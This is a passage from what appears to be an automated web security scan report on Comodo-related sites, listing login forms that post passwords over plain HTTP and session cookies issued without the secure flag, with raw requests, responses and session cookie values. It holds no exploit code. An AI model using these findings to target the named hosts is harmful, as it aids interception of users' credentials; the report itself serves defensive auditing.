<head>
<title>Phishing Attacks
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.9. http://www.vengine.com/products/prove_it.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/prove_it.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /products/prove_it.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/corporate/contact.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.6.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:39:55 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 12353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Int
...[SNIP]...
<div id="login" style="top: 46px;">

<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">


Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.10. http://www.vengine.com/products/tour.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/tour.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /products/tour.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:11 GMT
Content-Type: text/html
Content-Length: 12345
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Ban
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.11. http://www.vengine.com/products/vengine/eula.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/eula.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /products/vengine/eula.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:05 GMT
Content-Type: text/html
Content-Length: 18642
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Int
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.12. http://www.vengine.com/products/vengine/faq.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/faq.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /products/vengine/faq.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:09 GMT
Content-Type: text/html
Content-Length: 14577
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Sit
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.13. http://www.vengine.com/products/vengine/first_time.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/first_time.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /products/vengine/first_time.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:07 GMT
Content-Type: text/html
Content-Length: 10909
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Internet Security
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.14. http://www.vengine.com/products/vengine/help.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/help.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /products/vengine/help.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:04 GMT
Content-Type: text/html
Content-Length: 12152
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Internet Fraudste
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.15. http://www.vengine.com/products/vengine/index.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/index.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /products/vengine/index.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:38:37 GMT
Content-Type: text/html
Content-Length: 11866
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Site Authenticati
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.16. http://www.vengine.com/products/vengine/options.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/options.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /products/vengine/options.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:07 GMT
Content-Type: text/html
Content-Length: 11277
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Anti Phishin
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.17. http://www.vengine.com/products/vengine/requirements.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/requirements.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /products/vengine/requirements.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:05 GMT
Content-Type: text/html
Content-Length: 10780
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Installing Verifi
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.18. http://www.vengine.com/products/vengine/setup.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/setup.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /products/vengine/setup.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:06 GMT
Content-Type: text/html
Content-Length: 11624
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download Anti Phi
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.19. http://www.vengine.com/products/vengine/ssl_feedback.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/ssl_feedback.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /products/vengine/ssl_feedback.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/products/vengine/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.9.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:42:53 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 11376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>SSL Certificates
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.20. http://www.vengine.com/products/vengine/uninstall.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/uninstall.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /products/vengine/uninstall.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:08 GMT
Content-Type: text/html
Content-Length: 10248
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Download Ant
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.21. http://www.vengine.com/sitemap.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /sitemap.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /sitemap.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:16 GMT
Content-Type: text/html
Content-Length: 11070
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Sitemap - Anti Ph
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.22. http://www.vengine.com/support/faq.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /support/faq.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /support/faq.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:13 GMT
Content-Type: text/html
Content-Length: 15273
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Int
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.23. http://www.vengine.com/support/index.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /support/index.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /support/index.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/products/free_tools.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.3.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:39:23 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 9986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Int
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

3. SSL cookie without secure flag set
There are 7 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


3.1. https://accounts.comodo.com/cfp/management/signup

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://accounts.comodo.com
Path:   /cfp/management/signup

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cfp/management/signup HTTP/1.1
Host: accounts.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:03:57 GMT
Server: Apache
ETag: "f6420706d003e74fc9d717cc1e190b50"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _comodo_sasp_session=01e1085565732cbc99b7e85823fa75c7; path=/; HttpOnly
Content-Length: 48761
Status: 200
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...

3.2. https://accounts.comodo.com/cfp/management/terms

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://accounts.comodo.com
Path:   /cfp/management/terms

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cfp/management/terms HTTP/1.1
Host: accounts.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:03:59 GMT
Server: Apache
ETag: "3ecf7266c3a18f0a58b96482ba0e28e8"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _comodo_sasp_session=01e1085565732cbc99b7e85823fa75c7; path=/; HttpOnly
Content-Length: 40640
Status: 200
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<pre>
END USER LICENSE AND SUBSCRIBER AGREEMENT
Comodo Internet Security


IMPORTANT ... PLEASE READ THESE TERMS CAREFULLY BEFORE DOWNLOADING, INS
...[SNIP]...

3.3. https://accounts.comodo.com/esm/management/signup

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://accounts.comodo.com
Path:   /esm/management/signup

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /esm/management/signup HTTP/1.1
Host: accounts.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:04:01 GMT
Server: Apache
ETag: "b6b570bb3f1631ef9ea8a2a76928b0ca"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _comodo_sasp_session=01e1085565732cbc99b7e85823fa75c7; path=/; HttpOnly
Content-Length: 66118
Status: 200
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...

3.4. https://accounts.comodo.com/login

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://accounts.comodo.com
Path:   /login

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login HTTP/1.1
Host: accounts.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:03:59 GMT
Server: Apache
ETag: "6ec6b2f81215f905c8a500b7a070476b"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _comodo_sasp_session=01e1085565732cbc99b7e85823fa75c7; path=/; HttpOnly
Content-Length: 6189
Status: 200
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

3.5. https://www.panopticsecurity.com/Comodo/index.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.panopticsecurity.com
Path:   /Comodo/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Comodo/index.jsp?partner=Comodo HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://hackerguardian.com/hackerguardian/qa_sa_wizard.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.panopticsecurity.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:23:21 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=c437c7a28b71ec890cf440a1d883; Path=/PCICS
Connection: close
Content-Length: 590


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<meta http-equiv="Content-Type" content="text/html
...[SNIP]...

3.6. https://www.panopticsecurity.com/PCICS/MerController/doMetaQuestion

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.panopticsecurity.com
Path:   /PCICS/MerController/doMetaQuestion

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /PCICS/MerController/doMetaQuestion HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/MerController/doMetaQuestions
Content-Length: 203
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TemporaryTestCookie=yes; JSESSIONID=c4b181d68f939faf4b586b274a3e

partner=Comodo&theAnswer+to+Do+you+have+a+POS+terminal%2C+or+other+Payment+Application%2C+andourForwardSlashMarkeror+an+Imprint+Machine+%28ourDoubleQuoteMarkerknuckle-busterourDoubleQuoteMarker%29%3F=
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:31:49 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
